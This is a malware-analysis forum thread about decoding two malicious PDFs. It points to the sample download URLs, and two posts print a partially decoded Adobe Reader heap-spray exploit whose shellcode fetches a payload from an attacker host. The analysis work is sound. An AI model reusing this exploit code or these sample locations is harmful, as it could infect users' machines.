Malware Domain List


Title: PDF Failed to decode
Post by: Garlando on December 19, 2009, 09:03:11 am
I tried with PDFTK and PDF-PARSER.PY, and both fail. I get this from PDF-PARSER:

'ASCIIHexDecode decompress failed'


Title: Re: PDF Failed to decode
Post by: SysAdMini on December 19, 2009, 09:21:39 am
Please don't attach malware unprotected!!!! Please use a password-protected zip file next time, so that nobody opens the sample by accident and scanners don't strip the attachment.


I came across this sample too today. It can be found at
kijojg.net/fr/files/leerydumbbunny.pdf
I'm not aware of any tool that is able to decode the stream.

A second sample is here
kijojg.net/fr/files/scamtodosomething.pdf
password : infected
Title: Re: PDF Failed to decode
Post by: parody on December 19, 2009, 09:33:43 am
/LZWDecode support added.

/RunLengthDecode  support is odd. Not sure if i've done it right :P

But if you edit the PDF and remove /RunLengthDecode from the filter list, you can get a partial decode. Because that filter is skipped, the output below is corrupted in places, but it is enough to see this...


eval(unescape("%6V6%75%6E%63%74%69%6F%6E%20%64%68%63%58%45%4C%73%50%28%65%61%4B%2C%52%5A%43%4B%73%29%7B%7%68%69%6C%65%28%65%61%4B%2E%6C%65%6E%67%74%68%2A%32%20%3C%20%52%5A%43%4B%73%29%7B%65%61%4B%2B%3D%65%61%4B%3B%7D%65%61%4B%3D%65%l61%4B%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%52%5A%43%4B%73%2F%32%29%3B%72%65%74%75%72%6E%20%65%61%4B%3B%7D%686%75%6E%63%74%69%6F%6E%20%75%74%69%6C%5F%70%72%69%6E%74%6J6%28%29%7B%76%61%72%20%42%58%4C%53%57%73%52%3D%75%6E%65%73%63%61%70%65%28%2
There is much more than that, but I put it through an unescape decoder at http://gutterbunny.com/unescape.html and got the next layer of output...


"%6V6unction dhcXELsP(eaK,RZCKs){%7hile(eaK.length*2 < RZCKs){eaK+=eaK;}eaK=e%l61K.substring(0,RZCKs/2);return eaK;}h6unction util_print%6J6(){var BXLSWsR=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                          3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u503%4J4%u6972%u746E%u5066%u4644");var %7/7Waqvr=unescape(%2J2%u0A0A%u0A0A%u0A0A%u0A0A%2 2);var PeAp%4m=}7Waqvr+BXLSWsR;var Fhvm%5#5J=unescape(%2&2%u0A0A%u0A0A-2);var SuCYr=20;var haS%4&4X=SuCYr+PeApDm.length;while(Fhvm%5,5J.length < haSDX){FhvmUJ+=Fhvm%5>5J;}var ajxACMQa=FhvmU5J.substring(0,haS%4/4X);var Htv=FhvmX5J.substring(0,Fhvm%5&5J.length-haS%4
                                                                 4X);%7;7hile(Htv.length+haS%4X<0x40000){Htv=Htv+Htv+ajxACMQa;}var cRq=new Array();%6t6or(var i=0;i<1400;i++){cRq[i]=Htv+PeAp%4m;}var yhqqMJvA=129999999999999999998888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%88888888888888888888888888888888888888888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%8888888888888888888888888888888888888888888%K388888888888888;util.printf("%45000f%2&2,yhqqMJvA);}%6_6unction collab_email(){var %uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                                 3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                       3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%Z428%uE0CE%uFF60%u0455=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                           3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                 3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u453D%u616H4%u6C69%u4450%u0046%2&2);var cRq=ne%7)7 Array();var %4J4zGt=0x0c0c0c0c;var ZEcGsB4=0x400000;var OqDtL=%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                     3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                           3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF428%uE0CE%uFF60%u0455.length*2;var RZCKs=ZEcGsD-(OqDtL+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2z2);eaK=dhcXELsP(eaK,RZCKs);var WuJzgMSg=(%4;4zGt-0x400000)/ZEcGsD;%6&6or(var HXvCWU=0;HXvCWU5 < WuJzgMSg;HXvCW%5)5++){cRq[HXvCW%5 5]=eaK+%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                             3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                   3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%N428%uE0CE%uFF60%u0455;}var %5&5OW=unescape(%2&2%u0c0c%u0c0c%2);while(U5OW.length<44952){UOW+=%5OW;}this.collabStore=Collab.collectEmailIn%6o({subj:"",msg:UOW});}%6P6unction collab_geticon(){i%6q6(app.doc.Collab.getIcon){var VmmLQ=nex7 Array();var QnkOy%6 6=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                    3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                          3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u473D%u7465%u6%3>349%u6E6F%u4450%u0046%2/2);var QKh=QnkOy%6n6.length*2;var RZCKs=0x400000-(QKh+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2);eaK=dhcXELsP(eaK,RZCKs);var KMvc=(0x0c0c%H30c0c-0x400000)/0x400000;%6or(var PXCtFz=0;PXCtFz < KMvc;PXCtFz++){Vm%?6DLQ[PXCtFz]=eaK+QnkOy%6J6;}var cLxARQHR=unescape(%2
                                                                                                         2%09%2);%7hile(cLxARQHR.length<0x4000){cLxARQHR+=cLx1RQHR;}cLxARQHR=%2N.%2+cLxARQHR;app.doc.Collab.getIcon(cLxARQHR)% 3B}}%6 6unction bA%4G4EJFF(){var bzLA=app.vie%7}7erVersion.toString();bzLA=bzLA.replace(/\%4
                                                             4/g,""2);var cmQVSxL=ne%7 Array(bzLA.charAt(0),bzLA.charAt(1),bzLA.%$63harAt(2));i%6((cmQVSxL[0]==8)&&(cmQVSxL[1]==0)||(cmQVSx%<4C[1]==1&&cmQVSxL[2]<%3)3)){util_printf();}i%6((cmQVSxL[0]<8)||(cmQVSxL[0]==8&&cmQVSxL[1%o5D<2&&cmQVSxL[2]<2)){collab_email();}i%6((cmQVSxL[0]<9)||(cmQVSxL[0]==9&&cmQVSxL[1%Q5D<1)){collab_geticon();}}bADEJFF();

So if you look through the mess that gets output, we can see Collab.getIcon and Collab.collectEmailInfo being abused as usual, along with util.printf; the last function reads app.viewerVersion and calls whichever of the three routines matches the reader version. I'll clean up my parser code and upload it somewhere for people to grab: http://gutterbunny.com/pdfparser-parody.zip



ps. first time really coding in python which is prolly why my code is crap :D
Title: Re: PDF Failed to decode
Post by: origami on December 22, 2009, 04:47:50 pm
I can not grab these files, but I'd like to test them on our pdf framework:

http://security-labs.org/origami

Title: Re: PDF Failed to decode
Post by: SysAdMini on December 22, 2009, 04:52:34 pm
I can not grab these files, but I'd like to test them on our pdf framework:

http://security-labs.org/origami



Files are attached in the 2nd message of this topic. Direct link to attachment is:

http://www.malwaredomainlist.com/forums/index.php?action=dlattach;topic=3626.0;attach=539
Title: Re: PDF Failed to decode
Post by: origami on December 22, 2009, 06:50:07 pm
oups, thank u :)

origami/src/scripts/antivir>> ruby extractjs.rb /tmp/leerydumbbunny.pdf
--------------------------------------------------------------------------------
* Found the following scripts in /tmp/leerydumbbunny.pdf :
--------------------------------------------------------------------------------
../../parser/stream.rb:299:in `decodedata': Error while decoding stream 4 0 R (Origami::InvalidStream)
   -> [Origami::Filter::InvalidLZWData] LZW table is full and no clear flag was set

Good, a bug to fix ;)

origami/src/scripts/antivir>> ruby extractjs.rb /tmp/scamtodosomething.pdf
--------------------------------------------------------------------------------
* Found the following scripts in /tmp/scamtodosomething.pdf :
--------------------------------------------------------------------------------
eval(unescape("%76%61%72%20%6D%65%6D%6F%72%79...)

Better, no bug to fix :-D
Title: Re: PDF Failed to decode
Post by: malware on January 06, 2010, 09:33:26 am
/LZWDecode support added.

/RunLengthDecode  support is odd. Not sure if i've done it right :P

but if you edit the pdf and remove the /RunLengthDecode from the filter list you can get a partial decode. Enough to see this...


eval(unescape("%6V6%75%6E%63%74%69%6F%6E%20%64%68%63%58%45%4C%73%50%28%65%61%4B%2C%52%5A%43%4B%73%29%7B%7%68%69%6C%65%28%65%61%4B%2E%6C%65%6E%67%74%68%2A%32%20%3C%20%52%5A%43%4B%73%29%7B%65%61%4B%2B%3D%65%61%4B%3B%7D%65%61%4B%3D%65%l61%4B%2E%73%75%62%73%74%72%69%6E%67%28%30%2C%52%5A%43%4B%73%2F%32%29%3B%72%65%74%75%72%6E%20%65%61%4B%3B%7D%686%75%6E%63%74%69%6F%6E%20%75%74%69%6C%5F%70%72%69%6E%74%6J6%28%29%7B%76%61%72%20%42%58%4C%53%57%73%52%3D%75%6E%65%73%63%61%70%65%28%2
There is much more than that but I put it through an unescape decoder at http://gutterbunny.com/unescape.html (http://gutterbunny.com/unescape.html) and I get the next layer of output...


"%6V6unction dhcXELsP(eaK,RZCKs){%7hile(eaK.length*2 < RZCKs){eaK+=eaK;}eaK=e%l61K.substring(0,RZCKs/2);return eaK;}h6unction util_print%6J6(){var BXLSWsR=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                          3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u503%4J4%u6972%u746E%u5066%u4644");var %7/7Waqvr=unescape(%2J2%u0A0A%u0A0A%u0A0A%u0A0A%2 2);var PeAp%4m=}7Waqvr+BXLSWsR;var Fhvm%5#5J=unescape(%2&2%u0A0A%u0A0A-2);var SuCYr=20;var haS%4&4X=SuCYr+PeApDm.length;while(Fhvm%5,5J.length < haSDX){FhvmUJ+=Fhvm%5>5J;}var ajxACMQa=FhvmU5J.substring(0,haS%4/4X);var Htv=FhvmX5J.substring(0,Fhvm%5&5J.length-haS%4
                                                                 4X);%7;7hile(Htv.length+haS%4X<0x40000){Htv=Htv+Htv+ajxACMQa;}var cRq=new Array();%6t6or(var i=0;i<1400;i++){cRq[i]=Htv+PeAp%4m;}var yhqqMJvA=129999999999999999998888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%88888888888888888888888888888888888888888883888888888888888888888888888888888888888888%3888888888888888888888888888888888888888888%8888888888888888888888888888888888888888888%K388888888888888;util.printf("%45000f%2&2,yhqqMJvA);}%6_6unction collab_email(){var %uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                                 3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                       3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%Z428%uE0CE%uFF60%u0455=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                                           3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                                                 3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u453D%u616H4%u6C69%u4450%u0046%2&2);var cRq=ne%7)7 Array();var %4J4zGt=0x0c0c0c0c;var ZEcGsB4=0x400000;var OqDtL=%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                                                                     3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                                                                           3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF428%uE0CE%uFF60%u0455.length*2;var RZCKs=ZEcGsD-(OqDtL+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2z2);eaK=dhcXELsP(eaK,RZCKs);var WuJzgMSg=(%4;4zGt-0x400000)/ZEcGsD;%6&6or(var HXvCWU=0;HXvCWU5 < WuJzgMSg;HXvCW%5)5++){cRq[HXvCW%5 5]=eaK+%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                             3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                   3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%N428%uE0CE%uFF60%u0455;}var %5&5OW=unescape(%2&2%u0c0c%u0c0c%2);while(U5OW.length<44952){UOW+=%5OW;}this.collabStore=Collab.collectEmailIn%6o({subj:"",msg:UOW});}%6P6unction collab_geticon(){i%6q6(app.doc.Collab.getIcon){var VmmLQ=nex7 Array();var QnkOy%6 6=unescape("%uC033%u8B64%u;3040%u0C78%u408B%u8B0C%u1C70%u8BAJ4%u0858%u09EB%u408B%u8D534%u7C40%u588B%u6A%3#3C%u5A44%uE2%4\41%uE22B%uEC8B%u4FEB%u525A%uEA8:3%u8956%u0455%u5756%u738B%u8B%3
                                                                                    3C%u3374%u0378%u56F3%u768B%u0320%u33F%3,3%u49C9%u4150%u33A%4%u%3&36FF%uBE0F%u0314%uF2238%u0874%uCFC1%u030%4,4%u40FA%uEFEB%u%3J3B58%u75F8%u5EE5%u468B%u0324%u66C%3>3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u3%3\3B8%u8ACA%uE85B%uFFA2%uFFFF%uC0%32%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u66938%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568"%u6C72%u546%4Y4%u8EB8%u0E4E%uFFEC%u0455%u5093%uC03%3G3%u5050%u8B56%u0455%uC28%3
                                                          3%u837F%u%3#31C2%u5052%u%3G36B8%u2F1A%uFF70%u0455%u3%35B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEF%l428%uE0CE%uFF60%u0455%u7468%u7074%u2F%3A%u6B2F%u6A69%u6A6F%u2E67%u656E%u2F74%u726%{36%u6C2F%u616F%u7064%u6664%u702E%u7068%u693F%u7364%u473D%u7465%u6%3>349%u6E6F%u4450%u0046%2/2);var QKh=QnkOy%6n6.length*2;var RZCKs=0x400000-(QKh+0x%3>38);var eaK=unescape(%2&2%u9090%u9090%2);eaK=dhcXELsP(eaK,RZCKs);var KMvc=(0x0c0c%H30c0c-0x400000)/0x400000;%6or(var PXCtFz=0;PXCtFz < KMvc;PXCtFz++){Vm%?6DLQ[PXCtFz]=eaK+QnkOy%6J6;}var cLxARQHR=unescape(%2
                                                                                                         2%09%2);%7hile(cLxARQHR.length<0x4000){cLxARQHR+=cLx1RQHR;}cLxARQHR=%2N.%2+cLxARQHR;app.doc.Collab.getIcon(cLxARQHR)% 3B}}%6 6unction bA%4G4EJFF(){var bzLA=app.vie%7}7erVersion.toString();bzLA=bzLA.replace(/\%4
                                                             4/g,""2);var cmQVSxL=ne%7 Array(bzLA.charAt(0),bzLA.charAt(1),bzLA.%$63harAt(2));i%6((cmQVSxL[0]==8)&&(cmQVSxL[1]==0)||(cmQVSx%<4C[1]==1&&cmQVSxL[2]<%3)3)){util_printf();}i%6((cmQVSxL[0]<8)||(cmQVSxL[0]==8&&cmQVSxL[1%o5D<2&&cmQVSxL[2]<2)){collab_email();}i%6((cmQVSxL[0]<9)||(cmQVSxL[0]==9&&cmQVSxL[1%Q5D<1)){collab_geticon();}}bADEJFF();

So if you look through the mess that gets output, we can see Collab.getIcon  and Collab.collectEmail being abused as usual. I'll clean up this code and upload it somewhere for people to grab.   http://gutterbunny.com/pdfparser-parody.zip (http://gutterbunny.com/pdfparser-parody.zip)



ps. first time really coding in python which is prolly why my code is crap :D


I have used the same samples provided, so how come I cannot get the same result? I have installed Python and removed the /RunLengthDecode filter.

Usage: pdf-parser.py [option] {sample file}

Is this correct?
Title: Re: PDF Failed to decode
Post by: parody on January 06, 2010, 01:09:49 pm
I still had to add a decoder for the LZWDecode filter, so the unmodified pdf-parser.py will not produce the same output. A basic decoder is in the version of pdf-parser I linked in my other post.